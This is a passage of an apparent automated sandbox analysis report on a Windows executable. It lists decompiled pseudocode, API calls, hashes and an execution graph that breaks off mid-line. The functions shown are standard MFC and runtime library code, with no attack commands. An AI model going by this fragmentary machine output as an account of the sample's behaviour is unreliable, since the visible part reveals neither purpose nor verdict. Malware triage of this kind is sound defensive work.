					 *0x4668d8 = E0040D5D6(_t14, __ecx, _t17, __esi,  *(_t20 - 4));
				}
				_t9 =  *0x4668d8; // 0x73310000
				_t19 =  *(_t20 + 0xc);
				if(_t9 != 0) {
					_t12 = GetProcAddress(_t9,  *(_t20 + 8));
					if(_t12 != 0) {
						_t19 = _t12;
					}
				}
				return E00431B73(_t19);
			}









                  0x00426219
                  0x00426220
                  0x0042622c
                  0x0042622e
                  0x00426235
                  0x00426239
                  0x00426244
                  0x00426244
                  0x00426249
                  0x0042624e
                  0x00426253
                  0x00426259
                  0x00426261
                  0x00426263
                  0x00426263
                  0x00426261
                  0x0042626c

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00426220
                  • GetProcAddress.KERNEL32(73310000,?), ref: 00426259
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: AddressH_prolog3Proc
                  • String ID: UxTheme.dll
                  • API String ID: 3325816569-352951104
                  • Opcode ID: a4a852b16d3f4d644eb00760bbfc3205726ab498dccf1a41d59192cb352b88aa
                  • Instruction ID: 93154bf1de3ba644c085273ccdfcc23c9d4ad52bd39bf1df4da4c0410343f817
                  • Opcode Fuzzy Hash: a4a852b16d3f4d644eb00760bbfc3205726ab498dccf1a41d59192cb352b88aa
                  • Instruction Fuzzy Hash: 14E06530A012649BDB11BF76AC0571937D8BB04715F46406BFC00E72A1EBB989408B7D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042282A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0042282A(void* __ecx) {
				char _v8;
				intOrPtr* _v12;
				void* _t11;

				_v8 = 0x466638;
				E00430CF4( &_v8, 0x45cfdc);
				asm("int3");
				return  *((intOrPtr*)( *_v12 + 4))(0, _t11, __ecx);
			}






                  0x00422839
                  0x00422840
                  0x00422845
                  0x00422856

                  APIs
                  • __CxxThrowException@8.LIBCMT ref: 00422840
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ExceptionException@8RaiseThrow
                  • String ID: 8fF$8fF
                  • API String ID: 3976011213-2798571808
                  • Opcode ID: b981e969448221579f3da19129567584c7e0524e6b7c9e5e8841d6a8c252ee54
                  • Instruction ID: bcc99a705935aa0b096279d8265c82760203fa9d8db396da574b4737db60febc
                  • Opcode Fuzzy Hash: b981e969448221579f3da19129567584c7e0524e6b7c9e5e8841d6a8c252ee54
                  • Instruction Fuzzy Hash: D5D05B7514434CBFC304DBC9D459E8ABBADDBC8714F214156F61887641DBB1FD00C665
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004209F9, Relevance: 5.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 61%
                  			E004209F9(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t31;
				intOrPtr _t32;
				signed int _t38;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr* _t44;
				long* _t47;
				intOrPtr* _t50;

				_push(__ecx);
				_t50 = _a4;
				_t38 = 1;
				_t47 = __ecx;
				_v8 = 1;
				if( *((intOrPtr*)(_t50 + 8)) <= 1) {
					L10:
					_t24 =  &(_t47[7]); // 0x466584
					_t39 = _t24;
					EnterCriticalSection(_t39);
					_t25 =  &(_t47[5]); // 0x46657c
					E00420679(_t25, _t50);
					LeaveCriticalSection(_t39);
					LocalFree( *(_t50 + 0xc));
					 *((intOrPtr*)( *_t50))(1);
					_t31 = TlsSetValue( *_t47, 0);
					L11:
					return _t31;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0) {
						L5:
						_t44 =  *((intOrPtr*)( *(_t50 + 0xc) + _t38 * 4));
						if(_t44 != 0) {
							 *((intOrPtr*)( *_t44))(1);
						}
						_t31 =  *(_t50 + 0xc);
						 *(_t31 + _t38 * 4) =  *(_t31 + _t38 * 4) & 0x00000000;
						goto L8;
					}
					_t5 =  &(_t47[4]); // 0x7e0110
					if( *((intOrPtr*)( *_t5 + 4 + _t38 * 8)) == _t32) {
						goto L5;
					}
					_t31 =  *(_t50 + 0xc);
					if( *(_t31 + _t38 * 4) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					L8:
					_t38 = _t38 + 1;
				} while (_t38 <  *((intOrPtr*)(_t50 + 8)));
				if(_v8 == 0) {
					goto L11;
				}
				goto L10;
			}











                  0x004209fe
                  0x00420a03
                  0x00420a06
                  0x00420a0b
                  0x00420a0d
                  0x00420a10
                  0x00420a54
                  0x00420a54
                  0x00420a54
                  0x00420a58
                  0x00420a5f
                  0x00420a62
                  0x00420a68
                  0x00420a71
                  0x00420a7d
                  0x00420a83
                  0x00420a89
                  0x00420a8d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00420a12
                  0x00420a12
                  0x00420a12
                  0x00420a17
                  0x00420a31
                  0x00420a34
                  0x00420a39
                  0x00420a3f
                  0x00420a3f
                  0x00420a41
                  0x00420a44
                  0x00000000
                  0x00420a44
                  0x00420a19
                  0x00420a20
                  0x00000000
                  0x00000000
                  0x00420a22
                  0x00420a29
                  0x00420a2b
                  0x00420a2b
                  0x00420a48
                  0x00420a48
                  0x00420a49
                  0x00420a52
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,00000000,00466568,00466584,00466568,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF), ref: 00420A58
                  • LeaveCriticalSection.KERNEL32(00466584,00000000,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A68
                  • LocalFree.KERNEL32(?,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A71
                  • TlsSetValue.KERNEL32(00466568,00000000,?,00420AD8,007F7A80,00000000,00000000,?,?,00415B9F,00000000,00000000,000000FF,00000010,00415F21,00000000), ref: 00420A83
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterFreeLeaveLocalValue
                  • String ID:
                  • API String ID: 2949335588-0
                  • Opcode ID: bd4760c49065bc264e8e5b21d6b9a7af9dba21f9fb3e279cf7a4ce5c93557814
                  • Instruction ID: c67d59306e024ad0e16bde5a0a6ba0c27b3e8643983254bc6767e2b362cbf32f
                  • Opcode Fuzzy Hash: bd4760c49065bc264e8e5b21d6b9a7af9dba21f9fb3e279cf7a4ce5c93557814
                  • Instruction Fuzzy Hash: B0116735600314EFD724CF59E884F5AB7E8FF55315F90806AE546876A2CBB4EC50CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00424385, Relevance: 5.0, APIs: 4, Instructions: 38COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00424385(signed int _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t9;
				signed int _t10;
				void* _t13;
				intOrPtr* _t14;

				_t10 = _a4;
				_t15 = _t10 - 0x11;
				if(_t10 >= 0x11) {
					_t4 = E00406436(_t7, _t9, _t10, _t13, _t15);
				}
				if( *0x4666dc == 0) {
					_t4 = E0042431C();
				}
				_t14 = 0x466890 + _t10 * 4;
				if( *_t14 == 0) {
					EnterCriticalSection(0x466878);
					if( *_t14 == 0) {
						_t4 = 0x4666e0 + _t10 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t14 =  *_t14 + 1;
					}
					LeaveCriticalSection(0x466878);
				}
				EnterCriticalSection(0x4666e0 + _t10 * 0x18);
				return _t4;
			}













                  0x0042438d
                  0x00424390
                  0x00424393
                  0x00424395
                  0x00424395
                  0x004243a1
                  0x004243a3
                  0x004243a3
                  0x004243ae
                  0x004243b8
                  0x004243bf
                  0x004243c4
                  0x004243cb
                  0x004243d1
                  0x004243d7
                  0x004243d7
                  0x004243de
                  0x004243de
                  0x004243ee
                  0x004243f4

                  APIs
                  • EnterCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243BF
                  • InitializeCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243D1
                  • LeaveCriticalSection.KERNEL32(00466878,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243DE
                  • EnterCriticalSection.KERNEL32(-0006028E,?,?,?,?,004205E3,00000010,00000008,0041F391,0041F334,00406452,00411FA3), ref: 004243EE
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                  • String ID:
                  • API String ID: 2895727460-0
                  • Opcode ID: dfab13008bdaf96ebf00f0eb18ec2ef9bb80e0054cfda95d03d59bec202288f4
                  • Instruction ID: 12cf9614eb4c710b7d9bc39edca722b45593c528368f68ea10bc041c1aee9ecf
                  • Opcode Fuzzy Hash: dfab13008bdaf96ebf00f0eb18ec2ef9bb80e0054cfda95d03d59bec202288f4
                  • Instruction Fuzzy Hash: 30F0C272301124AFDB106B5AFC45B1DB769FBD1355F520037F54083151EBB898408AAE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042055C, Relevance: 5.0, APIs: 4, Instructions: 35COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0042055C(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x466584
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}







                  0x00420563
                  0x00420566
                  0x00420566
                  0x0042056a
                  0x00420570
                  0x00420575
                  0x0042059e
                  0x0042059f
                  0x00000000
                  0x004205a5
                  0x00420577
                  0x0042057a
                  0x00000000
                  0x00000000
                  0x0042057e
                  0x00420586
                  0x00000000
                  0x0042058d
                  0x00420594
                  0x00000000
                  0x0042059a

                  APIs
                  • EnterCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042056A
                  • TlsGetValue.KERNEL32(00466568,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042057E
                  • LeaveCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 00420594
                  • LeaveCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042059F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Leave$EnterValue
                  • String ID:
                  • API String ID: 3969253408-0
                  • Opcode ID: 340786f682d678f90d8c11d481e82e1f96306d9cde2d832645f35ad660a4072c
                  • Instruction ID: 125f687bcb126dd7327be4eaf8d3202bdee6bb285ee1efb8d35158a4d24e766b
                  • Opcode Fuzzy Hash: 340786f682d678f90d8c11d481e82e1f96306d9cde2d832645f35ad660a4072c
                  • Instruction Fuzzy Hash: 16F05476300228AFD7208F5AEC48C1B77EDFA893613554466F54693222D674F881CEDC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Analysis Process: YF4dF4w2Cr.exe PID: 6856 Parent PID: 6836 YF4dF4w2Cr.exeCOMMON

                  Execution Graph

                  Execution Coverage:6.8%
                  Dynamic/Decrypted Code Coverage:11.4%
                  Signature Coverage:1.6%
                  Total number of Nodes:1713
                  Total number of Limit Nodes:50

                  Graph

                  execution_graph 42228 4016f0 GetVersion 42229 401724 GetVersion 42228->42229 42230 40174a 42228->42230 42229->42230 42232 40172a 42229->42232 42261 414cc5 42230->42261 42302 417146 133 API calls 3 library calls 42232->42302 42233 401753 42271 404461 42233->42271 42236 401735 42238 40178b 42275 416787 42238->42275 42241 40179e 42242 404461 ctype 69 API calls 42241->42242 42243 4017a8 42242->42243 42244 4017c2 42243->42244 42304 401380 113 API calls 42243->42304 42279 40451b 42244->42279 42248 4017f8 42298 4165c6 42248->42298 42250 401801 42251 41576c 82 API calls 42250->42251 42252 40180a 42251->42252 42253 416609 252 API calls 42252->42253 42254 40182a 42253->42254 42255 401850 DragAcceptFiles 42254->42255 42256 40182e ctype 42254->42256 42257 412c34 ctype ShowWindow 42255->42257 42258 40186a UpdateWindow 42257->42258 42259 401881 ctype 42258->42259 42262 414cd1 __EH_prolog3 42261->42262 42263 414d2b 42262->42263 42265 404461 ctype 69 API calls 42262->42265 42315 426574 42263->42315 42267 414cf4 42265->42267 42266 414d3d std::_Locinfo::~_Locinfo 42266->42233 42268 414d16 42267->42268 42322 426ddd 83 API calls 4 library calls 42267->42322 42305 426d44 42268->42305 42273 404469 42271->42273 42272 43108c _malloc 69 API calls 42272->42273 42273->42272 42274 40175d 42273->42274 42274->42238 42303 4172aa 126 API calls 2 library calls 42274->42303 42276 416793 __EH_prolog3 42275->42276 42277 404461 ctype 69 API calls 42276->42277 42278 4167a2 std::_Locinfo::~_Locinfo 42276->42278 42277->42278 42278->42241 42554 40acdf 42279->42554 42281 404534 42282 4017e6 42281->42282 42283 404538 GetMenu 42281->42283 42282->42236 42284 416a7e 42282->42284 42283->42282 42286 416a8a __EH_prolog3 42284->42286 42285 416b1f ctype std::_Locinfo::~_Locinfo 42285->42248 42286->42285 42287 4014c0 ctype 82 API calls 42286->42287 42288 416ab0 42287->42288 42289 41f363 ctype 112 API calls 42288->42289 42290 416ab8 42289->42290 43483 4292e7 GetModuleFileNameA 42290->43483 42293 406039 118 API calls 42294 416ad7 42293->42294 42295 416ae3 PathRemoveExtensionA 42294->42295 42296 40a356 82 API calls 42295->42296 42297 416af4 GlobalAddAtomA GlobalAddAtomA 42296->42297 42297->42285 42299 4165d1 42298->42299 42300 4165d6 42298->42300 43496 406436 2 API calls 4 library calls 42299->43496 42302->42236 42303->42238 42304->42244 42306 426d50 __EH_prolog3 42305->42306 42307 404461 ctype 69 API calls 42306->42307 42308 426d64 42307->42308 42323 41f363 42308->42323 42311 426d6d ctype 42312 426dce ctype std::_Locinfo::~_Locinfo 42311->42312 42328 431ba5 42311->42328 42331 426700 42311->42331 42354 4057d4 82 API calls 42311->42354 42312->42263 42316 426582 42315->42316 42317 4265c8 GetPrivateProfileIntA 42315->42317 42553 42652c 7 API calls 42316->42553 42319 426590 42317->42319 42319->42266 42320 42658a 42320->42319 42321 426595 RegQueryValueExA RegCloseKey 42320->42321 42321->42319 42322->42268 42355 420aec 42323->42355 42325 41f372 42326 41f395 42325->42326 42366 4205c8 8 API calls 3 library calls 42325->42366 42326->42311 42409 43081b 42328->42409 42332 42671d __ftelli64_nolock 42331->42332 42333 426841 GetPrivateProfileStringA 42332->42333 42334 42675d 42332->42334 42337 42676d 42333->42337 42430 42652c 7 API calls 42334->42430 42339 406039 118 API calls 42337->42339 42338 426763 42338->42337 42340 426778 42338->42340 42342 42681e ctype 42339->42342 42431 4014c0 42340->42431 42450 430650 42342->42450 42344 4267bb 42350 4267cc RegQueryValueExA 42344->42350 42345 4267f8 RegCloseKey 42347 426812 42345->42347 42348 426834 42345->42348 42439 405562 42347->42439 42442 406039 42348->42442 42349 426894 42349->42311 42435 40a356 42350->42435 42354->42311 42357 420af8 __EH_prolog3 42355->42357 42358 420b46 42357->42358 42367 420802 TlsAlloc 42357->42367 42371 4206ea EnterCriticalSection 42357->42371 42393 406436 2 API calls 4 library calls 42357->42393 42386 42055c EnterCriticalSection 42358->42386 42363 420b59 42394 4208a9 90 API calls 5 library calls 42363->42394 42364 420b6c std::_Locinfo::~_Locinfo 42364->42325 42366->42325 42368 420833 InitializeCriticalSection 42367->42368 42369 42082e 42367->42369 42368->42357 42395 4063fe RaiseException __CxxThrowException@8 42369->42395 42376 42070d 42371->42376 42372 4207e3 LeaveCriticalSection 42372->42357 42373 4207cc _memset 42373->42372 42374 420746 42396 4148c1 42374->42396 42375 42075b GlobalHandle GlobalUnlock 42378 4148c1 ctype 82 API calls 42375->42378 42376->42373 42376->42374 42376->42375 42380 420779 GlobalReAlloc 42378->42380 42381 420785 42380->42381 42382 4207ac GlobalLock 42381->42382 42383 420790 GlobalHandle GlobalLock 42381->42383 42384 42079e LeaveCriticalSection 42381->42384 42382->42373 42383->42384 42400 4063fe RaiseException __CxxThrowException@8 42384->42400 42387 420577 42386->42387 42388 42059e LeaveCriticalSection 42386->42388 42387->42388 42389 42057c TlsGetValue 42387->42389 42390 4205a7 42388->42390 42389->42388 42391 420588 42389->42391 42390->42363 42390->42364 42391->42388 42392 42058d LeaveCriticalSection 42391->42392 42392->42390 42393->42357 42394->42364 42397 4148d6 ctype 42396->42397 42398 4148e3 GlobalAlloc 42397->42398 42401 401090 42397->42401 42398->42381 42402 4010a0 42401->42402 42403 40109b 42401->42403 42408 405ad1 82 API calls 3 library calls 42402->42408 42407 4063fe RaiseException __CxxThrowException@8 42403->42407 42406 4010a6 42408->42406 42410 430845 42409->42410 42411 430828 42409->42411 42413 430852 42410->42413 42415 43085f 42410->42415 42424 431d3e 69 API calls __getptd_noexit 42411->42424 42426 431d3e 69 API calls __getptd_noexit 42413->42426 42414 43082d 42425 4367e9 7 API calls 2 library calls 42414->42425 42427 43074f 103 API calls 2 library calls 42415->42427 42418 430857 42429 4367e9 7 API calls 2 library calls 42418->42429 42420 430876 42422 43083d 42420->42422 42428 431d3e 69 API calls __getptd_noexit 42420->42428 42422->42311 42424->42414 42426->42418 42427->42420 42428->42418 42430->42338 42432 4014c8 ctype 42431->42432 42433 4014d6 RegQueryValueExA 42432->42433 42434 401090 ctype 82 API calls 42432->42434 42433->42344 42433->42345 42434->42433 42436 40a366 42435->42436 42458 401280 42436->42458 42463 404aeb 42439->42463 42443 406045 __EH_prolog3 ctype 42442->42443 42511 401420 42443->42511 42448 406073 std::_Locinfo::~_Locinfo 42448->42342 42451 43065a IsDebuggerPresent 42450->42451 42452 430658 42450->42452 42552 43f5db 42451->42552 42452->42349 42455 436679 SetUnhandledExceptionFilter UnhandledExceptionFilter 42456 436696 __invoke_watson 42455->42456 42457 43669e GetCurrentProcess TerminateProcess 42455->42457 42456->42457 42457->42349 42459 401288 42458->42459 42460 40128f 42459->42460 42461 401090 ctype 82 API calls 42459->42461 42460->42345 42462 4012a5 42461->42462 42465 404afc 42463->42465 42464 404b08 42464->42342 42465->42464 42466 404b29 42465->42466 42469 4012b0 42465->42469 42478 43065f 69 API calls 3 library calls 42466->42478 42470 401090 ctype 82 API calls 42469->42470 42471 4012ba 42470->42471 42479 41481d 42471->42479 42473 4012f4 42483 43065f 69 API calls 3 library calls 42473->42483 42474 4012b0 82 API calls 42474->42473 42476 40130c 42476->42466 42478->42464 42480 414831 42479->42480 42481 4012e9 42479->42481 42484 43108c 42480->42484 42481->42473 42481->42474 42483->42476 42485 43113f 42484->42485 42486 43109e 42484->42486 42509 43add9 7 API calls __decode_pointer 42485->42509 42488 4310af 42486->42488 42494 4310fb RtlAllocateHeap 42486->42494 42496 431137 42486->42496 42497 43112b 42486->42497 42500 431130 42486->42500 42505 43103d 69 API calls 4 library calls 42486->42505 42506 43add9 7 API calls __decode_pointer 42486->42506 42488->42486 42502 43ad91 69 API calls 2 library calls 42488->42502 42503 43abe6 69 API calls 7 library calls 42488->42503 42504 4339b3 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 42488->42504 42489 431145 42510 431d3e 69 API calls __getptd_noexit 42489->42510 42494->42486 42496->42481 42507 431d3e 69 API calls __getptd_noexit 42497->42507 42508 431d3e 69 API calls __getptd_noexit 42500->42508 42502->42488 42503->42488 42505->42486 42506->42486 42507->42500 42508->42496 42509->42489 42510->42496 42512 401435 42511->42512 42513 40142b 42511->42513 42515 405e9c 42512->42515 42514 401090 ctype 82 API calls 42513->42514 42514->42512 42516 405ea8 42515->42516 42517 405ebb 42515->42517 42516->42517 42526 402720 42516->42526 42517->42448 42519 402ca0 42517->42519 42520 402cba 42519->42520 42521 402cab 42519->42521 42551 4025c0 82 API calls 3 library calls 42520->42551 42550 4025c0 82 API calls 3 library calls 42521->42550 42523 402cb4 42523->42448 42525 402cd3 42525->42448 42532 41b293 112 API calls ctype 42526->42532 42528 40272e 42529 402732 42528->42529 42533 402500 FindResourceA 42528->42533 42529->42517 42531 402740 42531->42517 42532->42528 42534 402524 42533->42534 42535 402535 42533->42535 42545 4019e0 LoadResource 42534->42545 42535->42531 42537 40252c 42537->42535 42538 40253d WideCharToMultiByte 42537->42538 42539 402578 WideCharToMultiByte 42538->42539 42540 402570 ctype 42538->42540 42541 402594 42539->42541 42540->42539 42542 40259b 42541->42542 42543 401090 ctype 82 API calls 42541->42543 42542->42531 42544 4025b9 42543->42544 42546 4019f6 42545->42546 42547 4019f9 LockResource 42545->42547 42546->42537 42548 401a1a 42547->42548 42549 401a07 SizeofResource 42547->42549 42548->42537 42549->42548 42550->42523 42551->42525 42552->42455 42553->42320 42555 40aceb __EH_prolog3 42554->42555 42556 4014c0 ctype 82 API calls 42555->42556 42557 40acfe 42556->42557 42558 402720 118 API calls 42557->42558 42559 40ad0b 42558->42559 42560 40ad22 42559->42560 42654 41b29e 83 API calls 2 library calls 42559->42654 42576 411f96 42560->42576 42566 405562 82 API calls 42567 40ad45 42566->42567 42631 40af79 42567->42631 42569 40ada7 42642 408862 42569->42642 42570 40ad9c GetMenu 42570->42569 42572 40adb8 42574 40ad6f ctype std::_Locinfo::~_Locinfo 42572->42574 42645 40f918 GetTopWindow 42572->42645 42574->42281 42577 41f363 ctype 112 API calls 42576->42577 42578 411fa3 _memset 42577->42578 42579 41f363 ctype 112 API calls 42578->42579 42619 40ad29 42578->42619 42580 411fdb 42579->42580 42581 41200c 42580->42581 42667 411c95 118 API calls 3 library calls 42580->42667 42583 41202e 42581->42583 42668 411c95 118 API calls 3 library calls 42581->42668 42584 412055 42583->42584 42669 411c95 118 API calls 3 library calls 42583->42669 42587 41207b 42584->42587 42670 411f52 120 API calls ctype 42584->42670 42589 4120a8 42587->42589 42671 411f52 120 API calls ctype 42587->42671 42590 4120c9 42589->42590 42592 40f52e 118 API calls 42589->42592 42593 4120ea 42590->42593 42594 40f52e 118 API calls 42590->42594 42592->42590 42595 412107 42593->42595 42596 40f52e 118 API calls 42593->42596 42594->42593 42597 412120 42595->42597 42599 40f52e 118 API calls 42595->42599 42596->42595 42598 41213d 42597->42598 42600 40f52e 118 API calls 42597->42600 42601 41215a 42598->42601 42602 40f52e 118 API calls 42598->42602 42599->42597 42600->42598 42603 412177 42601->42603 42604 40f52e 118 API calls 42601->42604 42602->42601 42605 412194 42603->42605 42655 40f52e 42603->42655 42604->42603 42606 4121b1 42605->42606 42608 40f52e 118 API calls 42605->42608 42609 4121ca 42606->42609 42610 40f52e 118 API calls 42606->42610 42608->42606 42611 4121e3 42609->42611 42612 40f52e 118 API calls 42609->42612 42610->42609 42613 412200 42611->42613 42615 40f52e 118 API calls 42611->42615 42612->42611 42614 41221d 42613->42614 42616 40f52e 118 API calls 42613->42616 42617 412236 42614->42617 42618 40f52e 118 API calls 42614->42618 42615->42613 42616->42614 42617->42619 42620 40f52e 118 API calls 42617->42620 42618->42617 42621 408c1d 42619->42621 42620->42619 42622 41f363 ctype 112 API calls 42621->42622 42623 408c2e LoadIconA 42622->42623 42624 408c9a 42623->42624 42625 408c43 _memset 42623->42625 42624->42566 42625->42624 42626 41f363 ctype 112 API calls 42625->42626 42627 408c6f 42626->42627 42683 4086b0 115 API calls 2 library calls 42627->42683 42629 408c7f 42629->42624 42684 411d22 142 API calls 3 library calls 42629->42684 42632 40afb4 42631->42632 42633 40af8d 42631->42633 42635 402ca0 ctype 82 API calls 42632->42635 42634 41f363 ctype 112 API calls 42633->42634 42636 40af92 LoadMenuA 42634->42636 42637 40afc2 42635->42637 42636->42632 42638 40ad6b 42636->42638 42685 410f67 42637->42685 42638->42569 42638->42570 42638->42574 42640 40b011 DestroyMenu 42640->42638 42643 41f363 ctype 112 API calls 42642->42643 42644 40886f LoadAcceleratorsA 42643->42644 42644->42572 42651 40f92c 42645->42651 42646 40f991 42646->42574 42647 40f950 SendMessageA 42647->42651 42649 40f982 GetWindow 42649->42651 42650 40f966 GetTopWindow 42650->42649 42650->42651 42651->42646 42651->42647 42651->42649 42651->42650 42652 40f918 449 API calls 42651->42652 42739 40ee68 42651->42739 42744 40f62d 42651->42744 42652->42649 42654->42560 42656 41f363 ctype 112 API calls 42655->42656 42657 40f540 42656->42657 42672 40ec5e 42657->42672 42660 40f54e 42677 40ed38 117 API calls ctype 42660->42677 42661 40f55f 42663 41f363 ctype 112 API calls 42661->42663 42666 40f556 42661->42666 42664 40f571 42663->42664 42678 40ebea 115 API calls 3 library calls 42664->42678 42666->42605 42667->42581 42668->42583 42669->42584 42670->42587 42671->42589 42673 40ec80 42672->42673 42674 40ec6c 42672->42674 42673->42660 42673->42661 42679 407887 42674->42679 42677->42666 42678->42666 42680 407892 GetModuleHandleA 42679->42680 42681 4078b6 GetProcAddress 42679->42681 42680->42681 42682 4078a2 LoadLibraryA 42680->42682 42681->42673 42682->42681 42683->42629 42684->42624 42686 410f8b 42685->42686 42688 410f7a 42685->42688 42687 41f363 ctype 112 API calls 42686->42687 42690 410fc9 42687->42690 42688->42686 42715 406436 2 API calls 4 library calls 42688->42715 42696 40b007 42690->42696 42697 410f0d 42690->42697 42694 411021 42716 40eef5 42694->42716 42696->42638 42696->42640 42698 420aec ctype 106 API calls 42697->42698 42699 410f23 42698->42699 42700 410f2e 42699->42700 42725 406436 2 API calls 4 library calls 42699->42725 42702 410f3c GetCurrentThreadId SetWindowsHookExA 42700->42702 42703 410f5e 42700->42703 42702->42703 42704 410f59 42702->42704 42706 40492c 42703->42706 42726 4063fe RaiseException __CxxThrowException@8 42704->42726 42707 404938 _setvbuf 42706->42707 42708 41f363 ctype 112 API calls 42707->42708 42709 404946 42708->42709 42727 41ead7 42709->42727 42711 404951 42712 40495f CreateWindowExA 42711->42712 42714 40495b _setvbuf 42711->42714 42731 4049a6 42712->42731 42714->42694 42715->42686 42717 420aec ctype 106 API calls 42716->42717 42718 40ef07 42717->42718 42719 40ef12 42718->42719 42738 406436 2 API 